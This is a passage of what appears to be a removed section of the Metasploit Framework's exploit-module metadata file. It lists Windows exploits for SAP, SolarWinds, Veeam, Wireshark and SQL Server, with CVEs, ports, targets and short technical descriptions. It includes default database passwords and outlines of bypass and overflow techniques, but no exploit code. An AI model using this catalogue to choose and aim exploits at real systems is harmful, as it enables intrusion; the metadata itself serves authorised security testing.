The module has been successfully tested on SAP Netweaver 7.0 EHP2\n SP6 over Windows XP SP3 and Windows 2003 SP2 (DEP bypass).", - "references": [ - "OSVDB-81759", - "CVE-2012-2611", - "BID-53424", - "EDB-20705", - "URL-http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities", - "URL-http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=Uncovering_SAP_vulnerabilities_reversing_and_breaking_the_Diag_protocol" - ], - "platform": "Windows", - "arch": "", - "rport": 3200, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SAP Netweaver 7.0 EHP2 SP6 / Windows XP SP3", - "SAP Netweaver 7.0 EHP2 SP6 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb", - "is_install_path": true, - "ref_name": "windows/misc/sap_netweaver_dispatcher", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/shixxnote_font": { - "name": "ShixxNOTE 6.net Font Field Overflow", - "fullname": "exploit/windows/misc/shixxnote_font", - "aliases": [], - "rank": 500, - "disclosure_date": "2004-10-04", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in ShixxNOTE 6.net.\n The vulnerability is caused due to boundary errors in the\n handling of font fields.", - "references": [ - "CVE-2004-1595", - "OSVDB-10721", - "BID-11409" - ], - "platform": "Windows", - "arch": "", - "rport": 2000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "ShixxNOTE 6.net Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/shixxnote_font.rb", - "is_install_path": true, - "ref_name": "windows/misc/shixxnote_font", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, 
- "needs_cleanup": null - }, - "exploit_windows/misc/solarwinds_amqp_deserialization": { - "name": "SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE", - "fullname": "exploit/windows/misc/solarwinds_amqp_deserialization", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-10-19", - "type": "exploit", - "author": [ - "Justin Hong", - "Lucas Miller", - "Piotr Bazydło", - "Spencer McIntyre" - ], - "description": "The SolarWinds Information Service (SWIS) is vulnerable to RCE by way of a crafted message received through the\n AMQP message queue. A malicious user that can authenticate to the AMQP service can publish such a crafted\n message whose body is a serialized .NET object which can lead to OS command execution as NT AUTHORITY\\SYSTEM.", - "references": [ - "CVE-2022-38108", - "URL-https://www.zerodayinitiative.com/blog/2023/2/27/cve-2022-38108-rce-in-solarwinds-network-performance-monitor", - "URL-https://www.solarwinds.com/trust-center/security-advisories/cve-2022-38108" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 5671, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2023-03-23 17:28:17 +0000", - "path": "/modules/exploits/windows/misc/solarwinds_amqp_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/misc/solarwinds_amqp_deserialization", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/solidworks_workgroup_pdmwservice_file_write": { - "name": "SolidWorks Workgroup PDM 2014 pdmwService.exe Arbitrary File Write", - "fullname": "exploit/windows/misc/solidworks_workgroup_pdmwservice_file_write", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-02-22", - "type": "exploit", - "author": [ - "Mohamed 
Shetta ", - "bcoles " - ], - "description": "This module exploits a remote arbitrary file write vulnerability in\n SolidWorks Workgroup PDM 2014 SP2 and prior.\n\n For targets running Windows Vista or newer the payload is written to the\n startup folder for all users and executed upon next user logon.\n\n For targets before Windows Vista code execution can be achieved by first\n uploading the payload as an exe file, and then upload another mof file,\n which schedules WMI to execute the uploaded payload.\n\n This module has been tested successfully on SolidWorks Workgroup PDM\n 2011 SP0 on Windows XP SP3 (EN) and Windows 7 SP1 (EN).", - "references": [ - "CVE-2014-100015", - "EDB-31831", - "OSVDB-103671" - ], - "platform": "Windows", - "arch": "", - "rport": 30000, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "SolidWorks Workgroup PDM <= 2014 SP2 (Windows XP SP0-SP3)", - "SolidWorks Workgroup PDM <= 2014 SP2 (Windows Vista onwards)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb", - "is_install_path": true, - "ref_name": "windows/misc/solidworks_workgroup_pdmwservice_file_write", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/splayer_content_type": { - "name": "SPlayer 3.7 Content-Type Buffer Overflow", - "fullname": "exploit/windows/misc/splayer_content_type", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-05-04", - "type": "exploit", - "author": [ - "xsploitedsec ", - "sinn3r " - ], - "description": "This module exploits a vulnerability in SPlayer v3.7 or prior. 
When SPlayer\n requests the URL of a media file (video or audio), it is possible to gain arbitrary\n remote code execution due to a buffer overflow caused by an exceeding length of data\n as the 'Content-Type' parameter.", - "references": [ - "OSVDB-72181", - "EDB-17243" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2/XP3" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/splayer_content_type.rb", - "is_install_path": true, - "ref_name": "windows/misc/splayer_content_type", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/stream_down_bof": { - "name": "CoCSoft StreamDown 6.8.0 Buffer Overflow", - "fullname": "exploit/windows/misc/stream_down_bof", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-12-27", - "type": "exploit", - "author": [ - "Fady Mohamed Osman " - ], - "description": "Stream Down 6.8.0 seh based buffer overflow triggered when processing\n the server response packet. 
During the overflow a structured exception\n handler is overwritten.", - "references": [ - "CVE-2011-5052", - "OSVDB-78043", - "BID-51190", - "URL-http://www.dark-masters.tk/", - "URL-http://web.archive.org/web/20121024141958/http://secunia.com/advisories/47343", - "EDB-18283" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "StreamDown 6.8.0" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/misc/stream_down_bof.rb", - "is_install_path": true, - "ref_name": "windows/misc/stream_down_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/talkative_response": { - "name": "Talkative IRC v0.4.4.16 Response Buffer Overflow", - "fullname": "exploit/windows/misc/talkative_response", - "aliases": [], - "rank": 300, - "disclosure_date": "2009-03-17", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Talkative IRC v0.4.4.16.\n When a specially crafted response string is sent to a client,\n an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-64582", - "BID-34141", - "EDB-8227" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/talkative_response.rb", - "is_install_path": true, - "ref_name": "windows/misc/talkative_response", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/tiny_identd_overflow": { - "name": "TinyIdentD 2.2 Stack Buffer Overflow", - "fullname": "exploit/windows/misc/tiny_identd_overflow", - "aliases": [], - "rank": 200, - 
"disclosure_date": "2007-05-14", - "type": "exploit", - "author": [ - "Maarten Boone", - "Jacopo Cervini " - ], - "description": "This module exploits a stack based buffer overflow in TinyIdentD\n version 2.2.\n If we send a long string to the ident service we can overwrite the\n return address and execute arbitrary code. Credit to Maarten Boone.", - "references": [ - "BID-23981", - "CVE-2007-2711", - "EDB-3925", - "OSVDB-36053" - ], - "platform": "Windows", - "arch": "", - "rport": 113, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows 2000 Server SP4 - English", - "Windows 2000 Pro All - English", - "Windows 2000 Pro All - Italian", - "Windows 2000 Pro All - French", - "Windows XP SP0/1 - English", - "Windows XP SP2 - English", - "Windows XP SP2 - Italian" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/tiny_identd_overflow.rb", - "is_install_path": true, - "ref_name": "windows/misc/tiny_identd_overflow", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Reliability": [ - "repeatable-session" - ], - "Stability": [ - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/trendmicro_cmdprocessor_addtask": { - "name": "TrendMicro Control Manger CmdProcessor.exe Stack Buffer Overflow", - "fullname": "exploit/windows/misc/trendmicro_cmdprocessor_addtask", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-12-07", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Blue" - ], - "description": "This module exploits a vulnerability in the CmdProcessor.exe component of Trend\n Micro Control Manger up to version 5.5.\n\n The specific flaw exists within CmdProcessor.exe service running on TCP port\n 20101. The vulnerable function is the CGenericScheduler::AddTask function of\n cmdHandlerRedAlertController.dll. 
When processing a specially crafted IPC packet,\n controlled data is copied into a 256-byte stack buffer. This can be exploited\n to execute remote code under the context of the user.", - "references": [ - "CVE-2011-5001", - "OSVDB-77585", - "ZDI-11-345" - ], - "platform": "Windows", - "arch": "", - "rport": 20101, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 Server SP2 (DEP Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb", - "is_install_path": true, - "ref_name": "windows/misc/trendmicro_cmdprocessor_addtask", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/ufo_ai": { - "name": "UFO: Alien Invasion IRC Client Buffer Overflow", - "fullname": "exploit/windows/misc/ufo_ai", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-10-28", - "type": "exploit", - "author": [ - "Jason Geffner", - "dookie" - ], - "description": "This module exploits a buffer overflow in the IRC client component of\n UFO: Alien Invasion 2.2.1.", - "references": [ - "OSVDB-65689", - "EDB-14013" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/ufo_ai.rb", - "is_install_path": true, - "ref_name": "windows/misc/ufo_ai", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/unified_remote_rce": { - "name": "Unified Remote Auth Bypass to RCE", - "fullname": "exploit/windows/misc/unified_remote_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-25", - "type": "exploit", - "author": [ - "h00die", - "H4RK3NZ0" - ], - "description": "This 
module utilizes the Unified Remote remote control protocol to type out and\n deploy a payload. The remote control protocol can be configured to have no passwords,\n a group password, or individual user accounts. If the web page is accessible, the\n access control is set to no password for exploitation, then reverted.\n If the web page is not accessible, exploitation will be tried blindly.\n This module has been successfully tested against version 3.11.0.2483 (50) on Windows 10.", - "references": [ - "EDB-49587", - "URL-https://www.unifiedremote.com/", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/unified%20remote/unified-remote-rce.py", - "CVE-2022-3229" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 9512, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "default" - ], - "mod_time": "2023-04-16 10:11:01 +0000", - "path": "/modules/exploits/windows/misc/unified_remote_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/unified_remote_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "screen-effects", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/misc/veeam_one_agent_deserialization": { - "name": "Veeam ONE Agent .NET Deserialization", - "fullname": "exploit/windows/misc/veeam_one_agent_deserialization", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-04-15", - "type": "exploit", - "author": [ - "Michael Zanetta", - "Edgar Boda-Majer", - "wvu " - ], - "description": "This module exploits a .NET deserialization vulnerability in the Veeam\n ONE Agent before the hotfix versions 9.5.5.4587 and 10.0.1.750 in the\n 9 and 10 release lines.\n\n Specifically, the module targets the HandshakeResult() method used by\n the Agent. 
By inducing a failure in the handshake, the Agent will\n deserialize untrusted data.\n\n Tested against the pre-patched release of 10.0.0.750. Note that Veeam\n continues to distribute this version but with the patch pre-applied.", - "references": [ - "CVE-2020-10914", - "CVE-2020-10915", - "ZDI-20-545", - "ZDI-20-546", - "URL-https://www.veeam.com/kb3144" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 2805, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2021-02-16 13:56:50 +0000", - "path": "/modules/exploits/windows/misc/veeam_one_agent_deserialization.rb", - "is_install_path": true, - "ref_name": "windows/misc/veeam_one_agent_deserialization", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/vmhgfs_webdav_dll_sideload": { - "name": "DLL Side Loading Vulnerability in VMware Host Guest Client Redirector", - "fullname": "exploit/windows/misc/vmhgfs_webdav_dll_sideload", - "aliases": [], - "rank": 300, - "disclosure_date": "2016-08-05", - "type": "exploit", - "author": [ - "Yorick Koster" - ], - "description": "A DLL side loading vulnerability was found in the VMware Host Guest Client Redirector,\n a component of VMware Tools. This issue can be exploited by luring a victim into\n opening a document from the attacker's share. An attacker can exploit this issue to\n execute arbitrary code with the privileges of the target user. This can potentially\n result in the attacker taking complete control of the affected system. 
If the WebDAV\n Mini-Redirector is enabled, it is possible to exploit this issue over the internet.", - "references": [ - "CVE-2016-5330", - "URL-https://securify.nl/advisory/SFY20151201/dll_side_loading_vulnerability_in_vmware_host_guest_client_redirector.html", - "URL-https://www.vmware.com/in/security/advisories/VMSA-2016-0010.html" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x64", - "Windows x86" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb", - "is_install_path": true, - "ref_name": "windows/misc/vmhgfs_webdav_dll_sideload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/webdav_delivery": { - "name": "Serve DLL via webdav server", - "fullname": "exploit/windows/misc/webdav_delivery", - "aliases": [], - "rank": 0, - "disclosure_date": "1999-01-01", - "type": "exploit", - "author": [ - "Ryan Hanson ", - "James Cook " - ], - "description": "This module simplifies the rundll32.exe Application Whitelisting Bypass technique.\n The module creates a webdav server that hosts a dll file. When the user types the provided rundll32\n command on a system, rundll32 will load the dll remotly and execute the provided export function.\n The export function needs to be valid, but the default meterpreter function can be anything.\n The process does write the dll to C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\TfsStore\\Tfs_DAV\n but does not load the dll from that location. This file should be removed after execution.\n The extension can be anything you'd like, but you don't have to use one. Two files will be\n written to disk. 
One named the requested name and one with a dll extension attached.", - "references": [], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/webdav_delivery.rb", - "is_install_path": true, - "ref_name": "windows/misc/webdav_delivery", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/wifi_mouse_rce": { - "name": "Wifi Mouse RCE", - "fullname": "exploit/windows/misc/wifi_mouse_rce", - "aliases": [], - "rank": 300, - "disclosure_date": "2021-02-25", - "type": "exploit", - "author": [ - "h00die", - "REDHATAUGUST", - "H4RK3NZ0" - ], - "description": "The WiFi Mouse (Mouse Server) from Necta LLC contains an auth bypass as the\n authentication is completely implemented entirely on the client side. 
By utilizing\n this vulnerability, is possible to open a program on the server\n (cmd.exe in our case) and type commands that will be executed as the user running\n WiFi Mouse (Mouse Server), resulting in remote code execution.\n\n Tested against versions 1.8.3.4 (current as of module writing) and\n 1.8.2.3.", - "references": [ - "EDB-50972", - "EDB-49601", - "CVE-2022-3218", - "URL-http://wifimouse.necta.us/", - "URL-https://github.com/H4rk3nz0/PenTesting/blob/main/Exploits/wifi%20mouse/wifi-mouse-server-rce.py" - ], - "platform": "Windows", - "arch": "x64, x86", - "rport": 1978, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "stager" - ], - "mod_time": "2022-09-26 15:45:42 +0000", - "path": "/modules/exploits/windows/misc/wifi_mouse_rce.rb", - "is_install_path": true, - "ref_name": "windows/misc/wifi_mouse_rce", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "screen-effects", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/windows_rsh": { - "name": "Windows RSH Daemon Buffer Overflow", - "fullname": "exploit/windows/misc/windows_rsh", - "aliases": [], - "rank": 200, - "disclosure_date": "2007-07-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a vulnerability in Windows RSH daemon 1.8.\n The vulnerability is due to a failure to check for the length of input sent\n to the RSH server. 
A CPORT of 512 -> 1023 must be configured for the exploit\n to be successful.", - "references": [ - "CVE-2007-4006", - "OSVDB-38572", - "BID-25044" - ], - "platform": "Windows", - "arch": "", - "rport": 514, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2003 SP1 English", - "Windows XP Pro SP2 English", - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/windows_rsh.rb", - "is_install_path": true, - "ref_name": "windows/misc/windows_rsh", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/wireshark_lua": { - "name": "Wireshark console.lua Pre-Loading Script Execution", - "fullname": "exploit/windows/misc/wireshark_lua", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-07-18", - "type": "exploit", - "author": [ - "Haifei Li", - "sinn3r " - ], - "description": "This module exploits a vulnerability in Wireshark 1.6 or less. When opening a\n pcap file, Wireshark will actually check if there's a 'console.lua' file in the same\n directory, and then parse/execute the script if found. 
Versions affected by this\n vulnerability: 1.6.0 to 1.6.1, 1.4.0 to 1.4.8", - "references": [ - "CVE-2011-3360", - "OSVDB-75347", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=6136", - "URL-http://technet.microsoft.com/en-us/security/msvr/msvr11-014" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Wireshark 1.6.1 or less" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/wireshark_lua.rb", - "is_install_path": true, - "ref_name": "windows/misc/wireshark_lua", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/misc/wireshark_packet_dect": { - "name": "Wireshark packet-dect.c Stack Buffer Overflow", - "fullname": "exploit/windows/misc/wireshark_packet_dect", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-04-18", - "type": "exploit", - "author": [ - "Paul Makowski", - "sickness", - "corelanc0d3r " - ], - "description": "This module exploits a stack buffer overflow in Wireshark <= 1.4.4\n by sending a malicious packet.", - "references": [ - "CVE-2011-1591", - "OSVDB-71848", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838", - "URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836", - "EDB-17185" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Win32 Universal (Generic DEP & ASLR Bypass)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/misc/wireshark_packet_dect.rb", - "is_install_path": true, - "ref_name": "windows/misc/wireshark_packet_dect", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mmsp/ms10_025_wmss_connect_funnel": { - "name": "Windows Media Services 
ConnectFunnel Stack Buffer Overflow", - "fullname": "exploit/windows/mmsp/ms10_025_wmss_connect_funnel", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-04-13", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "This module exploits a stack buffer overflow in the Windows Media\n Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially\n crafted FunnelConnect request, an attacker can execute arbitrary code\n under the \"NetShowServices\" user account. Windows Media Services 4.1 ships\n with Windows 2000 Server, but is not installed by default.\n\n NOTE: This service does NOT restart automatically. Successful, as well as\n unsuccessful exploitation attempts will kill the service which prevents\n additional attempts.", - "references": [ - "CVE-2010-0478", - "OSVDB-63726", - "MSB-MS10-025", - "URL-https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 1755, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro SP4 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb", - "is_install_path": true, - "ref_name": "windows/mmsp/ms10_025_wmss_connect_funnel", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/motorola/timbuktu_fileupload": { - "name": "Timbuktu Pro Directory Traversal/File Upload", - "fullname": "exploit/windows/motorola/timbuktu_fileupload", - "aliases": [], - "rank": 600, - "disclosure_date": "2008-05-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a directory traversal vulnerability in Motorola's\n Timbuktu Pro for Windows 8.6.5.", - "references": [ - "CVE-2008-1117", - "OSVDB-43544" - ], - "platform": "Windows", - "arch": "", - "rport": 407, - "autofilter_ports": [], - "autofilter_services": 
[], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/motorola/timbuktu_fileupload.rb", - "is_install_path": true, - "ref_name": "windows/motorola/timbuktu_fileupload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/lyris_listmanager_weak_pass": { - "name": "Lyris ListManager MSDE Weak sa Password", - "fullname": "exploit/windows/mssql/lyris_listmanager_weak_pass", - "aliases": [], - "rank": 600, - "disclosure_date": "2005-12-08", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a weak password vulnerability in the\n Lyris ListManager MSDE install. During installation, the 'sa'\n account password is set to 'lminstall'. Once the install\n completes, it is set to 'lyris' followed by the process\n ID of the installer. This module brute forces all possible\n process IDs that would be used by the installer.", - "references": [ - "CVE-2005-4145", - "OSVDB-21559" - ], - "platform": "Windows", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb", - "is_install_path": true, - "ref_name": "windows/mssql/lyris_listmanager_weak_pass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms02_039_slammer": { - "name": "MS02-039 Microsoft SQL Server Resolution Overflow", - "fullname": "exploit/windows/mssql/ms02_039_slammer", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-07-24", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This is an 
exploit for the SQL Server 2000 resolution\n service buffer overflow. This overflow is triggered by\n sending a udp packet to port 1434 which starts with 0x04 and\n is followed by long string terminating with a colon and a\n number. This module should work against any vulnerable SQL\n Server 2000 or MSDE install (pre-SP3).", - "references": [ - "CVE-2002-0649", - "OSVDB-4578", - "BID-5310", - "MSB-MS02-039" - ], - "platform": "Windows", - "arch": "", - "rport": 1434, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "MSSQL 2000 / MSDE <= SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms02_039_slammer.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms02_039_slammer", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms02_056_hello": { - "name": "MS02-056 Microsoft SQL Server Hello Overflow", - "fullname": "exploit/windows/mssql/ms02_056_hello", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-08-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "By sending malformed data to TCP port 1433, an\n unauthenticated remote attacker could overflow a buffer and\n possibly execute code on the server with SYSTEM level\n privileges. 
This module should work against any vulnerable\n SQL Server 2000 or MSDE install (< SP3).", - "references": [ - "CVE-2002-1123", - "OSVDB-10132", - "BID-5411", - "MSB-MS02-056" - ], - "platform": "Windows", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "MSSQL 2000 / MSDE <= SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/mssql/ms02_056_hello.rb", - "is_install_path": true, - "ref_name": "windows/mssql/ms02_056_hello", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/mssql/ms09_004_sp_replwritetovarbin": { - "name": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", - "fullname": "exploit/windows/mssql/ms09_004_sp_replwritetovarbin", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-12-09", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n Microsoft patched this vulnerability in SP3 for 2005 without any public\n mention.\n\n An authenticated database session is required to access the vulnerable code.\n That said, it is possible to access the vulnerable code via an SQL injection\n vulnerability.\n\n This exploit smashes several pointers, as shown below.\n\n 1. pointer to a 32-bit value that is set to 0\n 2. pointer to a 32-bit value that is set to a length influenced by the buffer\n length.\n 3. pointer to a 32-bit value that is used as a vtable pointer. 
In MSSQL 2000,\n this value is referenced with a displacement of 0x38. For MSSQL 2005, the\n displacement is 0x10. The address of our buffer is conveniently stored in\n ecx when this instruction is executed.\n 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n a displacement of 4. This pointer is not used by this exploit.\n\n This particular exploit replaces the previous dual-method exploit. It uses\n a technique where the value contained in ecx becomes the stack. From there,\n return oriented programming is used to normalize the execution state and\n finally execute the payload via a \"jmp esp\". All addresses used were found\n within the sqlservr.exe memory space, yielding very reliable code execution\n using only a single query.\n\n NOTE: The MSSQL server service does not automatically restart by default. That\n said, some exceptions are caught and will not result in terminating the process.\n If the exploit crashes the service prior to hijacking the stack, it won't die.\n Otherwise, it's a goner.", - "references": [ - "OSVDB-50589", - "CVE-2008-5416", - "BID-32710", - "MSB-MS09-004", - "EDB-7501" - ], - "platform": "Windows", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": [ - "Automatic", - "MSSQL 2000 / MSDE SP0 (8.00.194)", - "MSSQL 2000 / MSDE SP1 (8.00.384)", - "MSSQL 2000 / MSDE SP2 (8.00.534)", - "MSSQL 2000 / MSDE SP3 (8.00.760)", - "MSSQL 2000 / MSDE SP4 (8.00.2039)", - "MSSQL 2005 SP0 (9.00.1399.06)", - "MSSQL 2005 SP1 (9.00.2047.00)", - "MSSQL 2005 SP2 (9.00.3042.00)", - "CRASHER" - ], - "mod_time": "2020-10-02 17:38:06 